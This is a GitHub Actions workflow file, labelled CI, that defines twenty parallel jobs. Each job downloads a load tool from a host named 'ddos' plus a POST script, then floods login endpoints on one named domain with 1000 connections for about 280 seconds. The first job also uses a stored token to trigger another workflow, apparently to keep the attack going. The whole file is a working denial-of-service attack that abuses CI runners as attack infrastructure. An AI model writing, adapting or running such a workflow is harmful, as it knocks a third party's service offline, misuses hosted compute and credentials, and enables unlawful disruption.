ame: CI

on:
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  build1:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ secrets.AUTH_TOKEN }}
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s http://wy.targetedu.cn:9999/login/verify/0.6069696256114081
          curl -X POST -H "Authorization: token $GITHUB_TOKEN" -H "Accept: application/vnd.github.v3+json" -d '{"ref": "main"}' https://api.github.com/repos/niniubiwoc/run-script-action/actions/workflows/blank.yml/dispatches
  build2:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build3:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build4:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build5:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build6:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build7:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build8:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build9:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build10:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build11:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build12:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build13:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build14:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build15:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build16:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build17:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build18:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build19:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
  build20:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          ./wrk -c1000 -t300 -d280s -spost.lua http://wy.targetedu.cn/targetedu/index.php/adminUtil/login
